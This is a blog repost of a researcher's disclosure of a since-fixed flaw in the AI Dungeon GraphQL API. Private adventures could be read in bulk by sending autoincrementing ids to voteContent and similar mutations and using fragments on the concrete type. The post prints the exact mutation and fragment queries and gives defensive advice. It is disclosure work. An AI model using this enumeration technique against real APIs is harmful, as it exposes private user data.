Wednesday, April 28, 2021

Leak in AI Dungeon made all stories publicly accessible up until April 18th

AI Dungeon Public Disclosure Vulnerability Report - GraphQL Unpublished Adventure Data Leak

Notice: Following responsible disclosure procedures, the issues here have been brought up to the developers and have been fixed before this report was published. Similarly, all private data collected has been deleted.

Overview

424k raw requests

On April 18th, I discovered a vulnerability in the AI Dungeon GraphQL API that allowed unpublished adventures, unpublished scenarios, and unpublished posts to be leaked. These resources could be read in bulk, at a rate of approximately 1000 requests per minute. Unfortunately, this is, in fact, the second time I have discovered this exact vulnerability. The first time, the issue was reported and fixed, but after finding it again, I can see that simply reporting the issue was a mistake.

Rather, I am using this report as leverage. By making not only the devs, but the users aware of these critical issues, it will hopefully incentivize the AI Dungeon team to ensure that vulnerabilities like these never see the light of day. By leading by example with this report, I hope that others in the community will have something to emulate going forward, and that this sort of collaboration with the community will result in a much more secure product for all. I truly believe this to be the case because, thanks to this report, things are already changing for the better! (#Security Improvements Resulting From This Report)

Nevertheless, the issue still stands that the vulnerability did, in fact, exist. It is difficult to grasp the magnitude of a vulnerability like this, as well as its severity, from words alone. To help make this more tractable, I have compiled and published some heavily aggregated, anonymized adventure data.

The Data

Adventures, and the actions they contain, are the life blood of AI dungeon, so in the limited amount of time I was in possession of various data, I spent it analyzing adventures in bulk. The adventures gathered constitute all adventures created between the start of April 15th, 2021 and the start of April 19th, 2021. There was nothing preventing me from collecting more data, but what was gathered seemed sufficient to demonstrate the vulnerability fully - adventures dating all the way back to Dec 16th, 2019 were at risk. Unpublished scenarios, posts, and comments were also gathered but ended up being unused.

The vulnerability was discovered on April 18th, the data was collected over the span of a few hours on April 18th crossing into the 19th, and the vulnerability was announced to the devs on the 19th.

Now, what about the adventure data was analyzed? Actions. And, more specifically, non-multiplayer, non-ai generated, non-scenario actions. That is, anonymized user inputs. While the AI responses are interesting, they are relatively less so from a security point of view. The initial scenario prompt was discarded as well, to prevent popular scenarios from skewing the data. Finally, cloned adventures were also discarded, as were any excess adventures for users past the fifth one.

All this trimming cut the analysis down from 343k adventures and 12M actions to 188k adventures and 3.9M user actions. So what was compiled with all these user actions? Let's take a look.

An Example

Aggregated adventure data

The data is fairly simple. The first column is a sentence fragment without case and punctuation. The second column is a count of how many unique adventures a user typed in that exact sentence fragment. If a sentence fragment appeared in less than 10 unique adventures, it was discarded from the result set to preserve anonymity.

In this example, players typed "you summon a" in 1198 different adventures, which constituted 0.6% of all adventures analyzed. Similarly, players typed "you summon a demon" in 129 different adventures. There is absolutely no massaging of this data - so the counts for "you summon" and "you summoned" are completely different. This does not imply that the entire user input was "you summon a". It might have been "You clasp your hands together and you summon a bolt of lightning."

I haven't done an exhaustive exploration of the data by any means, other than spot checking it to ensure that it was correct before deleting the underlying data it was based off of.

Also note that, due to not having a terabyte of ram, this data needed to be processed in batches of around 10000 adventures per batch. In each batch, fragments appearing only once were purged. Therefore, counts under around 25 are actually underestimates.

A Surprising Observation 😳

Looking at the resulting aggregated data led to a very surprising observation. There were A LOT of lewd or otherwise nsfw user action fragments - way more than I had anticipated. As a bit of follow up analysis, I checked what percentage of adventures had explicitly lewd (18+) actions, and what percentage had nsfw actions.

The results are... surprising, to say the least. Out of the 188k adventures (and 3.9M user actions) analyzed:

87.3k (46.3% of all adventures sampled) are NSFW and...

59.1k (31.4%!!! of all adventures sampled) are explicit (18+)

Those, to me, are some insane numbers. Not only because, well, just the absolute sheer volume of the active player base that has chosen to interact with a state-of-the-art OpenAI language model by lewding it, but also because of just how sensitive the data is because of it. To reiterate, no, I will not be releasing any individual adventures in any capacity - they have long been deleted the second the statistics were gathered. However, this is very important data, both for the community and the AI Dungeon team. From these results, it's clear that a bad actor getting access to this data may as well be hacking something akin to an adult website, and can exploit all the fear, paranoia, and blackmail that comes with that. Hopefully not, but you can see why security is even more important than you might have initially thought.

The actual percentages result from the following procedure: Words that are only ever used in a lewd context being present in a user action result in the adventure being marked explicit and nsfw. Words that can go either way, but are still nsfw, mark the scenario as nsfw only. Therefore, the percentages presented here are actually the lower bounds, as I didn't check using an exhaustive list of words.

A Brief Tangent on Privacy

The above statistics make the recently implemented AI Dungeon content filter (made live on April 27th), and the following developer statement (made April 28th), downright shocking: Flagged Input

In summary - if user input on a private adventure is flagged using an automated system, it will be manually reviewed, with other private user adventures potentially being manually reviewed as well. With almost half of the userbase being involved with NSFW stories, this seems like a tremendous misstep, as users have an expectation that their private adventures are, well, private. Users went from being able to freely enjoy the AI, to now having to make a mental check of whether or not their input is appropriate. This seems like a violation of user expectations, and the resulting moderation a breach of privacy and trust. It is perhaps incredibly ironic coming from a report about a data breach, but I feel like I, as a third party, have put in more respect for user data than the developers have. This just seems backwards, and, although it might not mean much, I strongly urge the AI Dungeon team to reconsider their policies going forward.

Downloading the Data

Now that you know the data contains quite a bit of lewdness, you should not download it if you are sensitive to such topics. It also contains racial slurs, and other unpleasantness. However, the data is aggregated, anonymized, and for the most part, fairly clinical, so I recommend taking a look if you don't find those to be an issue. Through it, I have discovered the data is more sensitive than expected, but I hope that others in the community can make other discoveries as well!

Get the aggregated, anonymized adventure data here - JSON

Get the aggregated, anonymized adventure data here - CSV

Example scripts for using the json data

Security Discussion

There are a number of confounding factors that made this vulnerability much worse than it otherwise might have been. Some of these have already been fixed after being brought up to the devs (great work!), but I will still go over them, as I think they're important lessons to keep in mind for anyone wanting to practice good graphql api security, or api security in general.

In my opinion, the biggest four factors at the time of the vulnerability were:

  1. Using autoincrementing ids (if adventure #20 exists, adventure #21 is likely to exist, as are #22-#30 etc.)
  2. Not having reasonable rate limits in place
  3. Not having anomaly detection alerts
  4. Keeping introspection enabled in production

Now, let's go over what each one means.

Autoincrementing Ids

Autoincrementing ids are, in my opinion, by far the biggest issue. They allow someone to read all resources, simply by starting from 1 and counting upwards. Had these not been used, a secondary vulnerability would have needed to be discovered alongside the vote vulnerability in order to exploit either one. Otherwise, there would be no way to figure out what the private adventure ids are, even if they could be read through a vulnerability. I recommend deprecating and removing autoincrementing ids completely, as soon as possible. After which point leaking and publishing a non uuid id should be treated as a security issue just by itself.

Also note - autoincrementing ids allow anyone to trivially figure out roughly how many of each resource exists. For AI Dungeon, (as of April 19th) these would be:

  • ~1B actions
  • ~50M adventures
  • ~800K scenarios
  • ~250K comments - 10% on posts, 25% as nested comments, 50% on scenarios, 5% on adventures, 10% on "story" posts
  • ~20K posts

No Reasonable Rate Limits

Not having reasonable rate limits - this one is a mitigating factor, but could have still helped quite a bit by making the hurdle of reading thousands of resources much more difficult. It is not normal user behavior to upvote 1000 adventures a minute. Setting the maximum upvote mutations to, say, 5 requests max per second, 50 requests max per minute, and 500 requests max per hour, would have slowed down the data gathering tremendously.

No Anomaly Detection / Alerting

Of course, these sorts of limits can be overcome - especially with a free product like AI Dungeon. Hundreds of machines could be rented to turn those 500 requests max per hour into tens of thousands. These sorts of attacks require much more sophistication and coordination to pull off, however, making them much less likely. Not impossible, though, which means that these should be mitigated as well. In my opinion, the best way to deal with something like that is through high-threshold anomaly alerting. If the vote endpoint is suddenly getting hammered with 100x its normal traffic, a high-priority alert - not a warning - should be issued, and a developer should be paged.

Introspection Enabled in Production

Finally, introspection should be turned off in production for GraphQL. The AI Dungeon API is a fast-changing, unpublished API. There is no reason to allow users to be able to query all queries, mutations, subscriptions, objects, and enums in one query to __schema.

Again, this can be somewhat circumvented. The endpoints a client uses would, of course, be present in the client code, and users can simply look at requests being made in their browser. However, private, deprecated, and otherwise hidden functionality would not be exposed through this method. Security through obscurity should not be relied upon, but disabling introspection increases the barrier of entry for more advanced attacks.

Speaking of introspection, the following was the exact query made to the AI Dungeon GraphQL API to get the list of endpoints and resources back:

GraphQL introspection query

The response was parsed using some hacky javascript. However, the results are something I dare say are presentable. As you can see, the script resolves required variables, arguments, default values, and objects.

Hacky javascript to parse introspection results

Object Mutation
  Achievement achieve(achievementId:String)
  ActionError addAction(input:ActionInput)
  Adventure addAdventure(scenarioId:String, prompt:String, memory:String)
  Adventure addCharacter(input:CharacterInput)
  Boolean addDeviceToken(token:String, platform:String)
  // 100 or so mutations not shown

Breakdown of the Actual Vulnerability

The following goes into the technical details of the vulnerability itself. At a high level, the upvote api endpoint takes in an id and a resource type. The vulnerability consists of calling the upvote endpoint with ids identifying private resources, and getting full private resources back through a quirk of how graphql functions.

Here is the endpoint being called (all code snippets here were generated from parsing the introspection results - hence why you should disable introspection in production...!):

Votable voteContent(input:ContentResponseInput)

As you can see, the return type of voteContent is Votable. Here is its definition:

Interface Votable implemented by Adventure, Comment, Post, Scenario {
  id: ID
  publicId: String
  totalUpvotes: Int
  userVote: String
}

At this point, you might already be seeing how this comes together. The voteContent mutation returns a Votable, which is an interface implemented by Adventures, Comments, Posts, and Scenarios. And, depending on the ContentResponseInput, that's exactly what you get back - one of those four resource types.

Now, let's take a look at the ContentResponseInput object:

Input_object ContentResponseInput {
  contentId: String
  contentType: String
  data: JSONObject
  id: String
  responseType: String
  responseValue: String
}

ContentResponseInput is entirely generic, which is great for code reuse, but makes it so that all the resource types are affected by the same vulnerability!

So, how exactly is this endpoint a vulnerability?

Well, consider the following ContentResponseInput:

{
 "variables": {
  "input": {
   "contentId": "1",
   "contentType": "adventure",
   "responseType": "vote",
   "responseValue": "novote"
  }
 },
 "query": "mutation ($input:ContentResponseInput) { voteContent(input:$input) { __typename } }"
}

The mutation above actually returned a response from the AI Dungeon API. Hence why I say that all adventures were at risk. From adventure id #1 all the way to adventure id #72500000. Still - you might be asking - if the response type is a Votable, how are adventures being leaked? The answer is because Votable is actually an interface. A real concrete object type is powering the response. And, in this case, it would be an Adventure, as printed by __typename. This means that any fields of an Adventure (aka: all of them!) - could be queried for in the response.

Normally, however, GraphQL disallows this - only Votable interface fields can be queried for. So how were adventure fields fetched? GraphQL has the concept of fragments.

Take a look at the following:

Object Adventure {
  actions: [Action]
  id: ID
  user: User
  title: String
  // other fields omitted for clarity
}

Calling ... voteContent(input:$input) { actions } returns an error - actions is not a field of the Votable interface. However, by defining the following:

fragment MyVulnerability on Adventure { actions { text } id user { username } title }

...and including it:

mutation($input:ContentResponseInput) { voteContent(input:$input) { ...MyVulnerability } }

voteContent will return all fields in the fragment. This is perhaps a strange quirk of GraphQL, but nevertheless is a feature, and very important to take note of. I don't know if this functionality has an exact name, but I propose calling this 'downcasting', as you're essentially performing an explicit downcast on an interface into a more specific type, at which point you're able to query the downcasted fields.

Ironically, however, even if this quirk didn't exist, I would still consider the voteContent endpoint a security vulnerability. It allows a user to associate a public uuid with an autoincrementing id, and is callable on unpublished resources, which greatly increases the attack surface for those resources.

Now you know why voting is disabled on the site!

Upvoting is disabled

More Endpoints that Could Also Leak All Adventures

Interestingly, this vulnerability was actually present in multiple endpoints.

saveContent

// here's our good friend ContentResponseInput again
Savable saveContent(input:ContentResponseInput)

Interface Savable implemented by Adventure, Post, Scenario {
  id: ID
  isSaved: Boolean
  publicId: String
}

Saving of certain resources is currently disabled because of this vulnerability. saveContent is disabled

createContentResponse

// A different vulnerability, still using ContentResponseInput
ContentResponse createContentResponse(input:ContentResponseInput)

Object ContentResponse{
  commentText: String
  contentId: String
  contentType: String
  createdAt: DateTime
  data: JSONObject
  id: ID
  responseType: String
  responseValue: String
  user: User
  userId: String
  username: String
}

This generic endpoint is also disabled. In this case, downcasting didn't need to be used - we simply got a resource response back wholesale.

Disabling this endpoint means that typing in feedback currently doesn't work on the site. This is somewhat unfortunate, because there doesn't seem to be any indication to the end user that their feedback didn't go through.

Feedback is disabled

Feedback is disabled error message

createComment

// Anything 'Commentable' is also disabled - you could create a comment on any resource, and get the full resource back
Commentable createComment(input:CommentInput)

Interface Commentable implemented by Adventure, Comment, Post, Scenario {
  allowComments: Boolean
  comments: [Comment]
  id: ID
  publicId: String
  title: String
  totalComments: Int
  userId: String
}

Input_object CommentInput{
  commentText: String
  contentType: String
  id: String
  publicId: String
}

Anything Commentable was vulnerable as well - hence createComment being disabled.

Commenting is disabled

Anything Searchable

Interface Searchable implemented by Adventure, Post, Scenario { ... }

Finally, Searchable has the exact same potential vulnerability going on. However, by its very nature the Searchable endpoints return, well, searchable data, so this is less of an issue.

[Searchable] deletedContent
[Searchable] search(input:SearchInput)
[Searchable] featured(isHoliday:Boolean)
[Searchable] revampedFeatured(isHoliday:Boolean)

Interestingly, for Searchable, downcasting can actually be used to good effect for the feature it was meant to support - getting more specific details out of a result set without having to make multiple secondary queries!

Nevertheless, as you can see, a tremendous amount of endpoints all had the possibility of leaking every adventure, scenario, and post, and they've all been disabled because of it.

Conclusion

This is a serious vulnerability that was allowed to happen due to a number of conflating issues. As part of responsible disclosure, this issue, and a handful of others, have been brought up to the devs and have been fixed before this report was published. Hopefully, this report will serve as an inflection point for the AI Dungeon team, causing them to reprioritize their efforts on security related issues.

Security Improvements Resulting From This Report

The team has already made some security changes per my recommendations, such as disabling introspection to their GraphQL API, and are planning to schedule additional security penetration testing sessions to discover bugs and vulnerabilities before they become a problem. More automated testing resulting from this report was mentioned as well, which I am very happy to see. More testing leads to higher quality software, allowing devs to refactor safely, encouraging them to think critically about edge cases, and motivating best practices such as code reuse.

The half dozen or so vulnerable endpoints have been disabled as well, of course.

About Me

I am a site reliability engineer with a couple years of experience, and enjoy making things work. If you would like some consultation done, whether it's around graphql, security, infrastructure, scaling, or anything else, reach out. I'd love to work with you!

As something fun, I helped write the AI Dungeon Discord bot.

Back to top



from Hacker News https://ift.tt/32UGYSH

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.